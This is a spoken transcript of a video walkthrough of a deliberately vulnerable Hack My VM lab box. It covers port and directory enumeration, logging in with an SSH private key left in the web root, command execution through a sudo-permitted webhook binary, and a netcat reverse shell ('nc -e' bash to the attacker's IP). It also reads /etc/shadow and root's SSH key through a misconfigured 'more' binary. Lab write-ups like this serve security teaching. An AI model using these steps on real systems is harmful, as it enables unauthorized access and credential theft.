Hello and welcome once again. Today we are going to do this away box from Hack My VM. The creator is SML. The difficulty level is medium. So the box is up and running. The IP address is 192.168.1.66 and the TTL value shows us that this is a Linux box. So let's start with the nmap to see what open ports are running or what services are running on this box. So I'll start with nmap -r to not randomize, go in a sequential order, -v to verbose, sc to enumerate run some default scripts of nmap, sv to enumerate version, -v- for all ports. The IP is 192.168.1.66 and let's just write it to a file with on nmap tcp full. That's how I like to run my nmap. Hit enter and it's going to start, and it's doing the TNS resolution. I should have specified that flag to suppress this TNS resolution. Anyways, two ports are open, 22 and 80. Let's see what nmap tells about these services, details of the services running on these ports. So our scan is complete. 22 by default is SSH, and here is again SSH service running, and we see that this is OpenSSH 8.4 patch 1 Debian 5. So this is a Debian based box probably, unless or until we are going to see a Docker container. Otherwise this is a Debian box, and we have this nginx server running. That's right, that's fine. So before we start our web enumeration, let's go and visit and see what's on the web, since this is going to be the place for most of the attacks these days. And I see this is a login, and probably this is going to be the name tula, and I see this SSH fingerprint. Whenever you generate a SSH key, this is some kind of hash. Anyways, let's control U to view the source code, and I don't see anything in the source code except this message. So there is no such thing. Let me just try seeing that is this an HTML or PHP. HTML, it is HTML and PHP. Nope. So probably HTML based page this is, and I don't see any PHP thing, HTML index.php running. So I have a username, I know about the HTML. So let's start with the gobuster for directory enumeration. So gobuster dir for the directory mode, e to view in the detail mode. Word list is going to be user share word list, directory buster big.txt, extension should be txt, html, zip, and number of threads should be 50, and the IP is going to be 192.168, if I can type 66, and let's just tee this to gobuster.log. Oops, we haven't specified the URL flag. -u http. This is going to be the correct syntax, right? Gobuster is running, and index.html, and there is nothing else. So let's just try changing our dictionary. User share seclist, discovery, web content, raft, medium, directories, text. So this is another dictionary that I would like to try. You can try changing dictionary. Sometimes a regular dictionary fails, so you can try changing some dictionaries, but most of the time these two dictionaries work pretty well. I don't see anything. Another thing we had was the tula. So let's just try SSH in, and see if we can access via default credentials like admin or tula. So SSH tula @192.168.1.66. Fingerprint is going to be yes, and permission denied. So this is saying that public key is required. So this means that password based SSH is not allowed. We have to specify some kind of public key. So what else can we do? Normally when we generate an SSH key, we don't see this thing. This is some different format of SSH key. Normally we produce SSH bits, RSA based SSH keys, but this is like elliptic key based SSH key. What I am saying is, if I go to root and SSH key gen, this is going to generate right, this is the RSA 3072 format, right? But right now we are generating some different format. So if I try googling it, I can see the details. ED2559 is the key short to compared with RSA. Again, I think this is from the elliptic key cryptography. That's why the number of bits is small. So let's see what we get from this article. It says longer is not better in this case. Anyways, so how to generate this key, if I can see how to generate this key, right? And right, this is the key format this web page is displaying, and this is going to be the format of the key or the name of the key. In our case, when we generate this RSA base key, we get this id underscore rsa.pub and id rsa. So in this case, since this is a new Edwards curve digital signature algorithm, right? So it is going to be id underscore ed25519. So let me just close this thing, and if I try id 25519, do I get anything? I don't get anything. id underscore ed, let me just copy this thing, and now if I try id underscore, I get something. Great. So this means that this key pair is present in this web directory. We can download both things. So I'll go inside var temp 009, or let me just create a directory, make dir var temp 100, name it away from hmv, cd var temp 100. Right, I am inside over here, and I'll just grab the private key and public key to see what exactly are the contents. The file is downloaded, and .pub is going to be the public key, right? So now I'll download the public key, and it's downloaded. So let's see the contents of public key. Here is our public key, and the passphrase is the clock is ticking. Great. And the other is going to be the private key, right? This is the private key. So let me just change the permission, id 2559, ssh, specify the file, tula is going to be the host name, 192.168.1.66, right? And the passphrase was the clock is ticking, and we are inside. Great. So here we have our user.text. Here is the user.text. Great. So now we can try looking at the OS details for privilege escalation, and I see that Debian 11 is running. So not sure whether we can run some kernel or old exploits. Let's start with sudo-l to see if any permissions this user can run, tula can run. And it can run user bin webhook without any password and as user LULA. So this is interesting. I am not sure what webhook is. Webhook what? Let me just see what is webhook. Webhooks are automated messages sent from apps when something happens. They have a message or preload and are sent to a unique URL. Right, webhook Linux binary. Do we have anything interesting? A simple webhook binary to install at service. Writing GitHub webhooks with bash. We have a few things. So I can run this thing sudo user LULA user bin webhook. What do I get? If for some reason we can start with a verbose flag. It's running. Couldn't load hooks from the file hooks.json, no such file or directory. So we need to specify some kind of file hooks.json. Let's see, do we have anything? I am thinking of something that can give me webhook webhook Linux binary execute command, maybe. Help running commands to webhook, execute commands and scripts with webhook. Let's see what we have over here. Getting started, webhook id execute command. I am looking for this. Right, this is going to be our hooks.json. So if I can copy this thing, nano hooks.json, paste this thing, and id is going to be privesc or please subscribe. Please sub is going to be this. Execute command is going to be whoami, to see if we have some kind of code execution, and we can just delete this working directory because we don't need it. Save this thing, and now if we go, do we have hooks.json and web service, right? Verbose hooks is going to be hooks.json. So server looking on HTTP, right? This is running, and if we go to 192.168.66 hooks and please sub, oops, sorry, 9000 is going to be the port. I missed this thing, right? And command output LULA. So I am right now tula, but this command was running as LULA. So this executed whoami, and this is a great thing. So now we can start another netcut listener, nvnp port 80, and we can get a reversal as LULA. So let me just start create a revshell.sh, oops, nano, and nc-e pin bash 192.168. what is the IP of this box? 89. 192.168.1.89. Port is going to be 80, and that's it. chmod plus x revshell, and the path is going to be home tula revshell. So now we want to execute this script, right? So I'll go to nano hooks.json. Instead of this command, let's just paste the code over here. That is going to be this, and right. So if everything goes good, I should have a reversal connection as LULA. Right now I'm tula, now I should become LULA. So let's see. Please sub, oops, unable to connect. I think I didn't run the hook server. Here is it. Please sub. Format error. Should I specify that nishang thing. Oops. Where is it? Ref shell bin bash. It's ready. Please sub. Right. Now I have a reverse shell. Great. If I type who am I am LULA. So now I will try to load my cheat sheet. Where is my cheat sheet for becoming this interactive shell? TTY. I mean, you can just copy paste these things, but I'm a bit lazy. So Control Z, STTY, raw minus echo, G enter, export shell bash, export term is going to be xterm, STTY size 41171 is going to be the size 171 41. Right, so now we have everything ready. So let's just try running sudo again to see if we can LULA. We cannot, don't have the password of this user. What else can we do? We can go to the home directories and see if we have anything interesting. Bash history is bind to devnel, so we don't have anything. Maybe going to opt, we have anything interesting? Nope, we don't have. In the main directory, we don't have anything unusual. So to enumerate further, let me just download linpeas. This is going to be your best friend in case of privilege escalation. So let's just download this thing into dev shm wcat, and previously there was linpeas script hosted on GitHub, but now they have shifted. You'll have to download this sh thing, and it's downloading. And come on, it's downloaded. So chmod linpeas and t this to lin.log to see and log. So linpeas has started, and interesting thing will be highlighted in red or yellow. So let's just go to the top. So here is our user ID. Linux kernel is pretty new. I mean 22609. So you cannot find any kernel or Linux OS related or kernel related exploits over here, vulnerabilities here. So maybe something else is in this box. And Debian 11, again, this is new. Sudo version is again new. And current working directory, and it has come to an end. Right, let me just go to top again. Come on. Right, here we were. Some default things. I don't think this is going to be vulnerable to this exploit. Dirty pipe, maybe we can give it a try. Sudo vulnerability, I don't think so. This is going to be vulnerable to sudo. I mean, this is a very new box. Exploit suggester, is this a virtual machine? Obviously this is. Processes, so here is our reverse shell. Nice reverse shell. And what we have other than that, any cron jobs? I think these are all default cron jobs. Path, and nothing over here. Nothing seems usual. 8022 9000 is the one we exploited right now. So TCP dump is not present. 3 unusual users, or maybe 2 unusual users: LULA, root, and tula. Root is the default user. Anyways, moving further, what do we have? Anything? Useful software, base64, netcat, perl, sudo, insights enabled, OpenSSH, configuration was found. Interesting. What else we have? I mean, postfix, bind, access.log, SUID binaries, password, mount, umount, sudo, new group, write UL, unknown SUID binary. Maybe we can have a look at this thing. Is it an user bin more? Readable files belonging to root and readable by me but not world readable. Interesting. So more is like less a Linux based command, and maybe we can root and LULA, since this is in the LULA group, we can use this to maybe read some sensitive files that only root can do that. So let's just see if we can run more. Right, group LULA more. Interesting group writables files not in home. We can try with more. So if we can, if I can just show you that, oops, the session is broken. Oh, reset. I shouldn't have done this. nclvnp. I basically wanted to show that cat etc shadow is not readable by everyone, right? Only root user can do this. So if I just fork it to background, it's running. And now if I try getting my reverse shell, which I have, and again I will have to just do this, Control Z, stdy echo fg, enter. Shell is going to be bash, term is going to be xterm, and 41171 is going to be the size. 41171, right? So we are inside this more group, right? ls user bin more, and if we see about ls user bin less, oops, right? So this is only in the root group. Normally this is the what permissions are usually associated. Only root user and root group this less binary is, but right now more is in this LULA group, so we can try to read some sensitive files. So if I try user bin less etc shadow, I should get an access denied. But if I change this to more, I have this file where the hash password of this user is present. So this password format or this hash format will take a lot of time to crack, and cracking may not be a good option. So we can try reading some other sensitive file, which is going to be root id underscore rsa, root if ssh.ssh id.rsa, that is going to be the default file, but in this case it is going to be 25519 if I right. So we have the private key and the public key is here, so we can try ssh into this box. So this is going to be nano root ssh key. Here is the key. Save this thing, and I cannot write in this directory, right? I'm LULA, so just dev shm, paste this thing, save this thing, chmod 600 root ssh key, and now if I try to sshi root @ local host, Yes. ID whoami, IPA, and root flag is going to be root. Right. So this was the box, and we can now move to that var www directory and to see what exactly do we have. We only have these keys and in index.html. What do we have? Cat html. Right, so this was our first hint, this username, and this is the file that was created. So normally we see our rsa underscore id underscore rsa.pub, but in this case this is our key. And do we have any interesting thing in the root folder like bash history? Nope, we don't have anything other than that. So this was it. Hope you liked this video. The box was kind of a bit on the cryptic or CTF side, but if you are good with enumeration and just you'll basically find this box amusing. So if you like this video, please subscribe my channel and hit like, and also share your comments. Until next time, see you soon. Bye bye.